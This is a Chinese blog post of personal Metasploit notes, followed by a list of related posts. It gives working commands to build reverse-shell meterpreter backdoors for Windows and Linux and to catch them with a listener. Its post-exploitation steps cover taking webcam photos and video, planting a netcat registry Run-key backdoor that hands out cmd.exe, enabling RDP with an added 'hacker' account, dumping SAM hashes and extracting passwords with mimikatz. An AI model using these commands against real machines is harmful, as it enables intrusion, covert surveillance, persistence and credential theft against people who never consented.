【Web安全-MSF记录篇章一】

已于 2024-02-21 10:48:20 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: kali 内网渗透 文章标签: web安全 网络 服务器
于 2023-02-23 16:06:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/129182120
版权

文章目录

前言

最近打站,可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练,简单回顾一下

msfvenom生成远控木马

msfvenom是用来生成后门的软件,在目标主机上执行后门,在本地监听上线。

反向连接为例:

reverse_tcp:反向
bind_tcp: 正向

windows可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx lport=4444 -f exe -o demo.exe
linux可执行程序后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx lport=6666 -f elf > test.elf 

-p: payload
payload_name: 系统/架构/作用/方式
lhost:kali
lport:监听的端口
-f:指定输出格式
-o:output

在实际环境中,想办法将生成的木马上传到目标主机(通过历史漏洞、中间件解析漏洞、等等方式),并且用户要有执行权限,不然就要先提权了。
下面就要用到最常用的主机监听模块了:multi/handle,对指定主机,指定端口进行监听

use exploit/multi/handler						#使用监听模块
set payload windows/x64/meterpreter/reverse_tcp	#设置payload,不同版本的系统,payload不同
set host 192.168.xx.xx 							#设置kali的ip
set lport 5555									#设置监听的端口
run
                                   
use exploit/multi/handler                          
set payload linux/x64/meterpreter/reverse_tcp  	  
set lhost 192.168.53.135                         
set lport 6666                                    
run

在这里插入图片描述
此时,在受害机上执行我们生成的木马(大部分情况下是无法直接上传的,各种杀软会将其拦截,这个时候就需要加壳、免杀等等,后续会进行总结)就可以成功拿到主机的控制权限。

基本系统命令

sessions    #sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

webcam 摄像头命令

webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频

常用的信息收集脚本

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

注册表设置nc后门

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值

nc -v 192.168.xxx.xxx 443  #攻击者连接nc后门

开启 rdp&添加用户

enable_rdp 脚本

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=hacker PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过 enable_rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户是调用 cmd.exe 通过 net user 添加;端口转发是利用的 portfwd 命令

获取哈希

run post/windows/gather/smart_hashdump #从SAM导出密码哈希
#需要SYSTEM权限

mimikatz抓取密码

load mimikatz #help mimikatz 查看帮助
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
。。。。待补充

Stray.io
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf后渗透之获取登入password、远程控制、调用摄像头
m0_61506558的博客
09-02 2351
在terminal输入load kili creds_all直接获取密码(不一定成功) 使用kiwi_cmd sekurlsa::logonpasswords获取密码
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
msf 渗透基础篇(基本命令)
失心少年
07-30 2423
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
msfvenom的使用
A_Z_dd的博客
06-01 532
娱乐身心即可
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2218
MSF初体验(二)——Meterpreter命令
msf命令
qq_52469895的博客
05-19 2147
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
Metasploit小技巧
weixin_30443813的博客
08-07 282
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
MS17-010移植到MSF中进行入侵
自学编程_youkewang.top
05-17 1万+
勒索病毒爆发后,这个0day相继被各种利用,现在正在走向灭亡,趁现在大部分内网用户还没有重视该漏洞,于是我想在前人的教程基础上,发一篇自己总结出来的教程,让更多的人可以少走一点弯路。   图1-1. 教程分2个Part,第一个讲移植ms17-010扫描脚本到msf中进行漏扫;第二个讲移植ms17-010的exploit到msf中进行攻击。 漏洞的介绍和原理我就不废话了,请自行百度。
【技术分享】恶意框架样本分析-从Veil到Msf .pdf
09-05
【技术分享】恶意框架样本分析-从Veil到Msf 渗透测试是网络安全领域中一项重要的实践...在实际工作中,应当结合业务安全、数据安全安全体系和Web安全等多个方面,全面考虑安全防护策略,以应对不断演变的网络威胁。
Web渗透面试面试集锦.docx
12-14
1.1 MSF、Burp 考题 1.1.1 burpsuite 常用的功能是哪几个 答:仪表盘、漏洞扫描、代理、测试器、重发器、定序器 、编码器 、对比器 、 插件扩展、项目选项、用户选项等。 1.1.2 reverse_tcp 和 bind_tcp 的区别 答:...
SQL注入实例讲解
03-29
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或过滤用户输入的情况下,允许攻击者向数据库提交恶意SQL命令。在这个“SQL注入实例讲解”中,我们将深入探讨这一话题,了解其工作原理,以及如何...
SQL Server 2008商业智能完美解决方案 3/3
03-04
3.1.3 将MSF用于BI项目 49 3.1.4 Microsoft Solution Framework的阶段和可交付成果 49 3.2 BI项目需要的技能 53 3.2.1 必备技能 54 3.2.2 可选技能 55 3.3 建立团队 57 3.4 小结 62 第4章 商业智能解决方案的物理...
asp.net知识库
06-18
Asp.net 2.0功能体验,细节之Web控件(一) 隐藏控件 Asp.net 2.0功能体验,总体设计思想 Asp.net 2.0 WebPart使用经验点滴 革新:.NET 2.0的自定义配置文件体系初探 关于如何在ASP.NET 2.0中定制Expression ...
MSF基本使用
浅笑996的博客
11-10 2620
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
MSF初体验—入侵安卓手机
热门推荐
Banyan的博客
03-12 3万+
参考文章:http://www.cnblogs.com/hkleak/p/4852057.html 环境: windows8.1(装有pentestbox) IP:192.168.43.17 安卓手机一部(谷歌四儿子,安卓4.4.4)IP:192.168.43.152 在windwos控制台窗口用ipconfig查看本机IP 下面在启动pentestbox,因为我
MSF基础
懂进攻知防守
04-30 1688
本章记录的是MSF基础命令,供学习使用!
msf渗透实验基本操作(上)
kiwifruit__的博客
11-23 4266
1.实验内容 (1)Metasploit主机扫描 (2)Metasploit漏洞利用 (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit内网攻击及域渗透技术。 3.实验环境 vm虚拟机; kali2012,ip地址是192.168.70.128 win...
网络安全测评技术与标准
weixin_48579910的博客
07-06 900
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
中职网络安全B模块Cenots6.8数据库
最新发布
网络安全技术分享
07-09 505
密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,将该用户的用户名作为 flag 提交;密码:root), 进入 mysql 数据库,改变默认 mysql 管理员的名称,将系统的默认管理员 root 改为 admin,防止被列举,将操作命令作为 flag 提交。密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,使用 drop 命令将该用户删除,将操作命令作为 flag 提交。
J-MSF 一种新的多通道多尺度红外弱小目标检测算法.docx
12-15
本文档探讨了一种新型的多通道多尺度红外弱小目标检测算法——J-MSF(J-Modeled Scaled Feature Fusion)。红外弱小目标检测在军事领域至关重要,如预警、导弹制导等,由于目标特征稀少和背景复杂,传统检测方法如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值